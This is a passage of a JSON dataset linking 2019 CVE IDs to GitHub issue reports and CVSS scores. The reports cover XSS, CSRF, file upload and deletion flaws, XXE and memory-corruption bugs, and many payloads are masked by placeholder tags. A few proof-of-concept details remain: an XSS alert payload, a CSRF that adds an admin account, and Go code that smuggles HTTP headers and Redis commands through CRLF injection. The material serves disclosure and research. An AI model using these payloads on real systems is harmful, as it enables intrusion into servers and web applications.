        "description": "Bug: APITAG NUMBERTAG SS. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG alert('xss2') APITAG FILETAG FILETAG Fix: Filter the site_code parameter",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-9572",
        "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/3",
        "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/3",
        "Repo_new": "PearlyNautilus/Security-Code-Review",
        "Issue_Created_At": "2019-03-05T08:03:15Z",
        "description": "APITAG There is another file upload vulnerability on upload Theme, APITAG NUMBERTAG APITAG Product APITAG URLTAG Show case: FILETAG Edit a php file with special name FILETAG Transform it to a zip file like this FILETAG Theme file uploading... FILETAG We can find it from backstage processes. \\schoolcms PATHTAG line NUMBERTAG function APITAG FILETAG FILETAG With function APITAG FILETAG that we uploaded save in a specified location: \\schoolcms PATHTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-9594",
        "Issue_Url_old": "https://github.com/8test/pentest/issues/1",
        "Issue_Url_new": "https://github.com/8test/pentest/issues/1",
        "Repo_new": "8test/pentest",
        "Issue_Created_At": "2019-03-06T07:52:07Z",
        "description": "audit of bluecms. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9595",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/1",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/1",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2019-03-06T12:48:58Z",
        "description": "XSS injection vulnerability exists in FILETAG . callback.php CODETAG $params not filtered so we can use APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9598",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/4",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/4",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2019-03-06T09:20:08Z",
        "description": "Bug: APITAG NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability APITAG NUMBERTAG There is a CSRF vulnerability that can change of payment account to steal property POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG modification FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9603",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/29",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/29",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2019-03-06T08:43:27Z",
        "description": "I found a CSRF vulnerability. One: use CSRF vulnerability to delete article Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified article. Vulnerability url: FILETAG Vulnerability POC: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9634",
        "Issue_Url_old": "https://github.com/golang/go/issues/30642",
        "Issue_Url_new": "https://github.com/golang/go/issues/30642",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-03-06T21:00:30Z",
        "description": "runtime: dll injection vulnerabilities on Windows. MENTIONTAG suggested I open an issue for this rather than merely pushing fixes up to gerrit, so that we can track this for a NUMBERTAG point release. This runtime PR cleans up some APITAG usage: URLTAG And this x/sys PR makes the fallback there more reliable: URLTAG The goal is that everywhere APITAG preferred, but when not possible, APITAG is called only with either an absolute path computed properly with APITAG or with the exact string APITAG . I haven't yet dynamically traced the exes yet to verify I've whacked them all now, but hopefully I or someone else can get that done before this issue is closed.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-9656",
        "Issue_Url_old": "https://github.com/libofx/libofx/issues/22",
        "Issue_Url_new": "https://github.com/libofx/libofx/issues/22",
        "Repo_new": "libofx/libofx",
        "Issue_Created_At": "2019-03-06T06:59:42Z",
        "description": "a null pointer derefrence problem in function APITAG const&) in file APITAG The report and the poc to reproduce the bug can be found at here URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9658",
        "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6478",
        "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6478",
        "Repo_new": "checkstyle/checkstyle",
        "Issue_Created_At": "2019-02-25T03:28:30Z",
        "description": "Remove DTDs from FILETAG location on FILETAG is not secure. All checkstyle version below NUMBERTAG are not very secure, see details",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9658",
        "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6474",
        "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6474",
        "Repo_new": "checkstyle/checkstyle",
        "Issue_Created_At": "2019-02-24T15:42:58Z",
        "description": "Disable loading external DTDs by default, create system property to activate it. Ability to load external DTDs is considered as security issue, especially if DTDs are not hosted on https hosting. Checkstyle use to rely on remote DTD files previously so such ability was enabled by default. Old",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9660",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/12",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/12",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-03-09T01:29:50Z",
        "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG catname parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: ERRORTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-9661",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/13",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/13",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-03-09T01:37:00Z",
        "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-9662",
        "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/9",
        "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/9",
        "Repo_new": "jetiben/jtbc",
        "Issue_Created_At": "2019-03-10T12:32:11Z",
        "description": "There is a vulnerability that can delete unexpected critical files.. Vulnerability description An issue was discovered in JTBC(PHP NUMBERTAG It's cache management module is flawed. Arbitrary file ending in APITAG can be deleted via a PATHTAG FILETAG Change the param with the filename that we want to delete: FILETAG FILETAG FILETAG FILETAG Result: FILETAG JTBC(PHP) has many important files ends with \". APITAG this issues can damage the whole website: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9688",
        "Issue_Url_old": "https://github.com/forgeekscn/sftnow/issues/6",
        "Issue_Url_new": "https://github.com/forgeekscn/sftnow/issues/6",
        "Repo_new": "forgeekscn/sftnow",
        "Issue_Created_At": "2019-03-09T15:11:48Z",
        "description": "CSRF Vulneratbility to add admin account. POC is following code which clicked by admin will generate a superuser account called \"naive\" whose password is also \"naive\". APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9710",
        "Issue_Url_old": "https://github.com/marshmallow-code/webargs/issues/371",
        "Issue_Url_new": "https://github.com/marshmallow-code/webargs/issues/371",
        "Repo_new": "marshmallow-code/webargs",
        "Issue_Created_At": "2019-03-11T10:57:46Z",
        "description": "Race conditions for parallel requests. I just noticed that something in webargs or marshmallow isn't thread safe. Take this minimal example\" CODETAG Run it with threading enabled: $ FLASK_APP=webargsrace.py flask run p NUMBERTAG with threads Now send two requests in parallel, with different values: $ http post URLTAG 'value=foo' & ; http post URLTAG 'value=bar' & The output from these two requests is: APITAG APITAG Clearly not what one would have expected! :bomb: The output of the print statement showing the request data and what the field receives confirms the issue: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-9736",
        "Issue_Url_old": "https://github.com/cnxh/1024tools/issues/20",
        "Issue_Url_new": "https://github.com/cnxh/1024tools/issues/20",
        "Repo_new": "cnxh/1024tools",
        "Issue_Created_At": "2019-03-07T04:47:52Z",
        "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type APITAG APITAG \uff0cthe xss vulnerability will be triggered. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9737",
        "Issue_Url_old": "https://github.com/pandao/editor.md/issues/662",
        "Issue_Url_new": "https://github.com/pandao/editor.md/issues/662",
        "Repo_new": "pandao/editor.md",
        "Issue_Created_At": "2019-03-07T03:35:34Z",
        "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type CODETAG \uff0cthe xss vulnerability will be triggered. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9738",
        "Issue_Url_old": "https://github.com/jimmykuu/gopher/issues/88",
        "Issue_Url_new": "https://github.com/jimmykuu/gopher/issues/88",
        "Repo_new": "jimmykuu/gopher",
        "Issue_Created_At": "2019-03-12T07:54:03Z",
        "description": "XSS vulnerability in APITAG label,SVG include attack vector.. This label and attack vector will cause dom based XSS. if you type APITAG APITAG \uff0cthe xss vulnerability will be triggered. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9741",
        "Issue_Url_old": "https://github.com/golang/go/issues/30794",
        "Issue_Url_new": "https://github.com/golang/go/issues/30794",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-03-13T02:40:30Z",
        "description": "net/http CRLF injection vulnerability. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG Principles The current implementation of APITAG does not encode the \u2018 \u2019 sequence in the query string, which allowed the attacker to manipulate a HTTP header with the \u2018 \u2019 sequence in it, so the attacker could insert arbitrary content to the new line of the HTTP header. What did you do? APITAG Consider the following Golong code snippet: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG HTTP NUMBERTAG injected: header TEST NUMBERTAG url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } In this script, the host parameter usually could be controlled by user, and the content of host above is exactly the payload. We setup a server using nc to open a NUMBERTAG port and to receive and display the HTTP request data from client , then run the code above on a client to sent a HTTP request to the server. nc l p NUMBERTAG GET /?a NUMBERTAG HTTP NUMBERTAG injected: header TEST: PATHTAG HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Go http client NUMBERTAG Accept Encoding: gzip As you can see in the picture above , the nc server displayed the HTTP request with a manipulated header content:\u201d X injected:header\u201d, which means we successfully injected the HTTP header. In order to make the injected header available, we have to add an extra \u2018 \u2019 after the new header, so we add another parameter to contain the original parameter data, like \u2018TEST\u2019 in above sample. Attack Scenarios NUMBERTAG By crafting HTTP headers, it\u2019s possible to fool some web services NUMBERTAG It\u2019s also possible to attack several simple services like Redis, memcached. Let\u2019s take Redis as a example here: Adapt the script above to this: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG SET test success \" url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } We changed the injected header to a valid redis command, after executing this, we check the redis server: APITAG GET test \"success\" APITAG We can see that a \u201ctest\u201d key was inserted successfully. Conclusion The implementation of parameter handling of APITAG is vulnerable, which allows attacker to manipulate the HTTP header. Attacker who has ability to take control of the requesting address parameter of this library, could exploit this vulnerability to manipulate a HTTP header and attack an internal host like a normal Webserver, Memcached, Redis and so on.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9749",
        "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/1135",
        "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/1135",
        "Repo_new": "fluent/fluent-bit",
        "Issue_Created_At": "2019-02-25T16:27:34Z",
        "description": "Memory corruption while processing MQTT input plugin leading to crash of the server. Fluent Bit MQTT input plugin acting as MQTT broker (server) incorrectly handles incoming network messages. After processing crafted packet plugin executes APITAG function with negative size param. That leads to crash of the whole Fluent Bit server via SIGSEGV signal. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: PATHTAG i mqtt t data o stdout m ' ' APITAG Fluent Bit NUMBERTAG Copyright (C) Treasure Data FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9764",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5519",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5519",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2019-03-20T10:50:50Z",
        "description": "Something isn't right.... When filing a bug, please include the following headings if possible. Any example text in this template can be deleted. Overview of the Issue A paragraph or two about the issue you're experiencing. Reproduction Steps Steps to reproduce this issue, eg NUMBERTAG Create a cluster with n client nodes n and n server nodes NUMBERTAG Run APITAG NUMBERTAG iew error Consul info for both Client and Server APITAG APITAG info APITAG APITAG APITAG APITAG APITAG info APITAG APITAG APITAG Operating system and Environment details OS, Architecture, and any other information you can provide about the environment. Log Fragments Include appropriate Client or Server log fragments. If the log is longer than a few dozen lines, please include the URL to the FILETAG of the log instead of posting it in the issue. Use APITAG on the client and server to capture the maximum log detail.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-9765",
        "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/43",
        "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/43",
        "Repo_new": "xpleaf/blog_mini",
        "Issue_Created_At": "2019-03-14T02:09:05Z",
        "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG APITAG function and PATHTAG NUMBERTAG line. Steps To Reproduce NUMBERTAG select one article detials, like: URLTAG NUMBERTAG find the article comment or create new comment. APITAG the comment, and the nikename is XSS APITAG APITAG alert NUMBERTAG APITAG ,then submit. FILETAG APITAG the reply button, trigger the payload.use this vulnerability, I can stealing admin cookies and more. FILETAG author by jin. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9768",
        "Issue_Url_old": "https://github.com/thinkst/canarytokens/issues/35",
        "Issue_Url_new": "https://github.com/thinkst/canarytokens/issues/35",
        "Repo_new": "thinkst/canarytokens",
        "Issue_Created_At": "2019-03-13T10:30:05Z",
        "description": "APITAG Detection Bypass (MS WORD). This was reported to EMAILTAG NUMBERTAG days ago. Please confirm and fix these issues, also I'd really like a version number. Reported by Gionathan Armando Reale Identification: Due to PATHTAG being very limited in variation it is easily possible to detect which Word documents are likely to contain APITAG Detection Bypass: Opening a Word document containing a APITAG using Protected View will allow you to view the file without triggering the APITAG Opening the Word document with Libreoffice Writer NUMBERTAG will allow you to view the file without triggering the APITAG Other document viewers may also bypass detection.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9770",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/99",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/99",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2019-03-12T10:51:26Z",
        "description": "serveral bugs in APITAG libredwg version libredwg NUMBERTAG and NUMBERTAG description txt libredwg download link URLTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LEADER at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG bit_read_B MENTIONTAG description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function bit_read_B at commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dxf_header_write at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG dwg_dxf_LTYPE MENTIONTAG description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function bit_convert_TU at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG out of bounds read description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function dwg_dxf_BLOCK_CONTROL at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG FILETAG And a same report send to APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9785",
        "Issue_Url_old": "https://github.com/zhaopengme/gitnote/issues/209",
        "Issue_Url_new": "https://github.com/zhaopengme/gitnote/issues/209",
        "Repo_new": "zhaopengme/gitnote",
        "Issue_Created_At": "2019-03-14T05:42:14Z",
        "description": "malicious markdown file can cause RCE. Describe the bug A malicious markdown file can cause remote code execute\u3002 To Reproduce Steps to reproduce the behavior NUMBERTAG clone the respository to local place NUMBERTAG open the malicious file Expected behavior if the file contains malicious code, it will be executed\u3002 Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: mac os version NUMBERTAG B NUMBERTAG ersion: version NUMBERTAG B NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-9834",
        "Issue_Url_old": "https://github.com/netdata/netdata/issues/5800",
        "Issue_Url_new": "https://github.com/netdata/netdata/issues/5800",
        "Repo_new": "netdata/netdata",
        "Issue_Created_At": "2019-04-04T12:24:56Z",
        "description": "CVETAG . We're running your nightly release APITAG rc NUMBERTAG nightly). Has this issue been addressed already? I couldn't find another issue about this cve. CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9837",
        "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
        "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
        "Repo_new": "doorkeeper-gem/doorkeeper-openid_connect",
        "Issue_Created_At": "2019-02-07T01:06:49Z",
        "description": "Open redirect vulnerability when APITAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9843",
        "Issue_Url_old": "https://github.com/diffplug/spotless/issues/358",
        "Issue_Url_new": "https://github.com/diffplug/spotless/issues/358",
        "Repo_new": "diffplug/spotless",
        "Issue_Created_At": "2019-02-13T20:52:58Z",
        "description": "The XML parser isn't respecting APITAG as false. Original Comment: URLTAG > CODETAG If we are seeing HTTP get requests inside of the XML parser that means that the parser is vulnerable to XXE URLTAG . We need to fix this so that the spotless XML formatter is not making external entity requests. We can't have our linting infrastructure making web requests. Especially web requests over HTTP as those can be maliciously intercepted by a MITM. Here's an example where this has been a serious problem in the past. URLTAG CC: MENTIONTAG This is a security vulnerability in spotless and should be treated as such.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-9870",
        "Issue_Url_old": "https://github.com/w8tcha/CKEditor-oEmbed-Plugin/issues/94",
        "Issue_Url_new": "https://github.com/w8tcha/ckeditor-oembed-plugin/issues/94",
        "Repo_new": "w8tcha/ckeditor-oembed-plugin",
        "Issue_Created_At": "2019-03-12T15:34:23Z",
        "description": "Issue within the APITAG APITAG Plugin. Hi W8tcha, I discovered an issue within the APITAG plugin but I would not like to disclose it here. Is there a way to come in contact with you via your work email? Kind Regards, Ioannis Adamos",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9878",
        "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/46",
        "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/46",
        "Repo_new": "kermitt2/pdfalto",
        "Issue_Created_At": "2019-03-13T07:19:33Z",
        "description": "invalid memory access in APITAG ). Description we observed a invalid memory access in function APITAG ) located in APITAG APITAG same be triggered by sending a crafted pdf file to the pdfalto binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command : ./pdfalto f NUMBERTAG l NUMBERTAG APITAG APITAG outline annotation APITAG blocks APITAG ocr APITAG $POC POC REPRODUCER URLTAG Degub ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-9893",
        "Issue_Url_old": "https://github.com/seccomp/libseccomp/issues/139",
